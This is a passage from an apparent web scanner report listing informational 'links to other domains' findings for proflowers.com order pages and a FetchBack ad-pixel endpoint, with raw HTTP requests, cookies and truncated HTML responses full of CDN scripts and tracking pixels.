<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/orderprocessoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
r="0" title="Go to Proflowers Homepage" href="http://www.proflowers.com/default.aspx?tile=hmpg_podA&amp;ssid=27&amp;Ref=HomeNoRef&amp;COBRAND=pfc" style="display:inline-block;height:30px;width:179px;"><img class="PFLogoOP" height="30px" width="179px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Go to Proflowers Homepage" style="border-width:0px;" /></a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<td><img id="ctl00_ProgessBar1_imagedatalist_ctl00_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step1_GiftOptions_Selected.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl01_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/CardMessageMiddle_Future.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl02_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_SignIn_FutureStep.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl03_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_Delivery_FutureStep.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl04_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_Billing_FutureStep.gif" style="border-width:0px;" /></td><td><img id="ctl00_ProgessBar1_imagedatalist_ctl05_image" vspace="0" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/Step_PlaceOrder_FutureStep.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="OPLeftColumn" valign="top" style="width:577px;">
                               
                               
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/giftoptionspage.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<td valign="middle" style="width:70px;">
<img id="ctl00_OrderProcessPageBody_ctl01_accSelectionList_productList_ctl00_ctl00__productImage" vspace="0" hspace="0" src="https://a248.e.akamai.net/7/248/497/0001/image.proflowers.com/is/image/ProvideCommerce/summerchocolates08_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=60&amp;hei=60" style="height:60px;width:60px;border-width:0px;" />
</td>
...[SNIP]...
<td valign="middle" style="width:70px;">
<img id="ctl00_OrderProcessPageBody_ctl01_accSelectionList_productList_ctl01_ctl00__productImage" vspace="0" hspace="0" src="https://a248.e.akamai.net/7/248/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=60&amp;hei=60" style="height:60px;width:60px;border-width:0px;" />
</td>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<div id="FaqOuterContainer" ><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="SelectedProductSummary_ProductImageContainer" style="margin-bottom:10px;"> <img id="ctl00_RightSidebarSpaceTop_ctl00_FeatureProductList_ctl00__productImg" border="0" src="https://a248.e.akamai.net/7/248/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT8inspath_wdtpr09_s?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=120&amp;hei=140" style="height:140px;width:120px;border-width:0px;" /><!--[.net]-->
...[SNIP]...
<td id="SelectedAccessory_image" style="height:60px; min-width:0;"> <img id="ctl00_RightSidebarSpaceTop_ctl00_FeatureProductList_ctl00_selectedAccessories_productList_ctl00_ctl00__productImage" src="https://a248.e.akamai.net/7/248/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwoodtaper_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=60&amp;hei=60" style="height:60px;width:60px;border-width:0px;" /> </td>
...[SNIP]...
gn.com/splash?form_file=fdf/splash.fdf&dn=ORDERS.PROFLOWERS.COM&lang=en','Verisign','width=560,height=500,directories=no,location=yes,menubar=no,scrollbars=yes,status=yes,toolbar=no,resizable=yes');" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/VeriSignSecurity.gif" style="border: 0px;"/></a>
...[SNIP]...
e is prohibited.
* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
* http://www.opinionlab.com
-->

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine_pr.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_enginered.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" title=" site feedback"></a>
...[SNIP]...

16.14. https://orders.proflowers.com/orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx?aspxerrorpath=/OrderProcess/GiftOptions.aspx HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx?flexShown=False&deliveryon=True&scAddItem=true&tile=hmpg_carousel&trackingpgroup=HPC&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=428685
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:10:21 GMT
Content-Length: 22986


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <head id="Head1"><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_shoppingcart.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_opfaq.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><title>
...[SNIP]...
<META HTTP-EQUIV="Refresh" CONTENT="1740;URL=http://www.proflowers.com/">
       <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</head>
    <body id="OrderPageBody__bodyControl" marginwidth="0" bgColor="#ffffff" background="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/images/Background_PFC.gif" topMargin="0" marginheight="0" leftMargin="0" link="#5A1300" alink="#5A1300" vLink="#5A1300"></body>
...[SNIP]...
<td>
       

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/orderprocessoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<a border="0" title="Go to Proflowers Homepage" href="http://www.proflowers.com/default.aspx" style="display:inline-block;height:30px;width:179px;"><img class="PFLogoOP" height="30px" width="179px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Go to Proflowers Homepage" style="border-width:0px;" /></a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<br>
                               <IMG height="48" alt="" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/pfsite/headers/HDR_WereSorry.gif" width="400" vspace="2" border="0">
                               <br>
...[SNIP]...
<td vAlign="top" align="left"><IMG height="32" alt="" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/pfsite/images/op_YellowAlertIcon.gif" width="32" border="0">&nbsp;&nbsp;
                                                                   <span class="headline">
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
e is prohibited.
* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
* http://www.opinionlab.com
-->

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine_pr.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_enginered.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" title=" site feedback"></a>
...[SNIP]...

16.15. https://orders.proflowers.com/orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx?aspxerrorpath=/OrderProcess/GiftOptions.aspx HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f24%2f2011&pid=30003767&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=168084
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253APLA7139-8%252522PeaceLily(Sympathy)%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:13:17 GMT
Content-Length: 22986


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <head id="Head1"><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_shoppingcart.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_opfaq.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><title>
...[SNIP]...
<META HTTP-EQUIV="Refresh" CONTENT="1740;URL=http://www.proflowers.com/">
       <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</head>
    <body id="OrderPageBody__bodyControl" marginwidth="0" bgColor="#ffffff" background="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/images/Background_PFC.gif" topMargin="0" marginheight="0" leftMargin="0" link="#5A1300" alink="#5A1300" vLink="#5A1300"></body>
...[SNIP]...
<td>
       

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/orderprocessoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<a border="0" title="Go to Proflowers Homepage" href="http://www.proflowers.com/default.aspx" style="display:inline-block;height:30px;width:179px;"><img class="PFLogoOP" height="30px" width="179px" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Go to Proflowers Homepage" style="border-width:0px;" /></a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<br>
                               <IMG height="48" alt="" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/pfsite/headers/HDR_WereSorry.gif" width="400" vspace="2" border="0">
                               <br>
...[SNIP]...
<td vAlign="top" align="left"><IMG height="32" alt="" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/pfsite/images/op_YellowAlertIcon.gif" width="32" border="0">&nbsp;&nbsp;
                                                                   <span class="headline">
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
e is prohibited.
* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
* http://www.opinionlab.com
-->

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine_pr.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_enginered.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" title=" site feedback"></a>
...[SNIP]...

16.16. http://pixel.fetchback.com/serve/fb/pdc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /serve/fb/pdc?cat=&name=landing&sid=3006&browse_products=91637&fb_key=undefined%20Fields%20of%20Europe%20for%20Spring HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304902899_11051:0_13981:207837_13479:207837_15758:367170_12704:367170_4895:795355_10164:1159631_10638:1159631_10640:1159631_10641:1159631_1437:1159631_1660:1723227; uid=1_1304902899_1303179323923:6792170478871670; kwd=1_1304902899_12936:207837_11317:1159631_11717:1159631_11718:1159631_11719:1159631; sit=1_1304902899_3006:34:0_3455:207837:207837_2988:430117:395946_3801:542560:542140_1714:827093:795355_3306:1054719:367170_719:1160458:1159631_2451:1211327:1206227_3236:1369290:1369172_782:1723576:1723227; cre=1_1304902899_29802:59536:1:541928_29805:59534:1:542589; bpd=1_1304902899_1ZCU5:4QNG; apd=1_1304902899; scg=1_1304902899; ppd=1_1304902899; afl=1_1304902899

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:08:51 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1304903331_13521:0_11051:0_11051:432_13981:208269_13479:208269_15758:367602_12704:367602_4895:795787_10164:1160063_10638:1160063_10640:1160063_10641:1160063_1437:1160063_1660:1723659; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: uid=1_1304903331_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: kwd=1_1304903331_12936:208269_11317:1160063_11717:1160063_11718:1160063_11719:1160063; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: sit=1_1304903331_3006:466:0_3455:208269:208269_2988:430549:396378_3801:542992:542572_1714:827525:795787_3306:1055151:367602_719:1160890:1160063_2451:1211759:1206659_3236:1369722:1369604_782:1724008:1723659; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: cre=1_1304903331_29802:59536:1:542360_29805:59534:1:543021; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: bpd=1_1304903331_1ZunS:0_1ZCU5:4QUE; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: apd=1_1304903331; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: scg=1_1304903331; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: ppd=1_1304903331; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: afl=1_1304903331; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 01:08:51 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2321

<!-- campaign #11051 is eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(tim
...[SNIP]...
<!-- matched campaign #13521 is eligible -->
<img src="http://ad.doubleclick.net/activity;src=1379696;dcnet=4155;boom=46435;sz=1x1;ord=1?"width="1" height="1" border="0" alt="">
<img src="http://ads.undertone.com/fc.php?pid=1913&cb=[timestamp]" alt="" style="display: none;" border="0" height="1" width="1" />
<img src="http://pixel.rubiconproject.com/tap.php?v=5970|1|14" border="0" width="1" height="1" />
<!-- Fetchback Retargeting 645 -->
<img src="http://ads.revsci.net/adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=4298BE5B089CBB1E55E7A69A4E062327&rsi_site=BCE6C348CDB3347A37A6E9503B9F4896&rsi_event=3E8A9FCC69C70348C54F8308F5EEBF2B"/>
<!-- Google Code for 1800Flowers Remarketing List -->
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1033375529/?label=LmmICKPn7gEQqZ7g7AM&amp;guid=ON&amp;script=0"/>
</div>
</noscript>
<img src="http://idcs.interclick.com/Segment.aspx?sid=b053470b-90a6-47ab-9052-d6a092e04e08"/>
<!-- "1800Flowers" c/o "FetchBack", segment: '1800Flowers Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=39804&partnerID=91&clientID=4744&key=segment&returnType=js"></script>
<noscript>
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=39804&partnerID=91&clientID=4744&key=segment" width="1" height="1" />
</noscript>
<!-- End of pixel tag -->
<img src="http://at.amgdgt.com/ads/?t=pp&px=15038&rnd=$timestamp" width="1" height="1" border="0"/>
<script src="http://ad.adtegrity.net/pixel?id=972818&t=1" type="text/javascript"></script>
...[SNIP]...

16.17. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
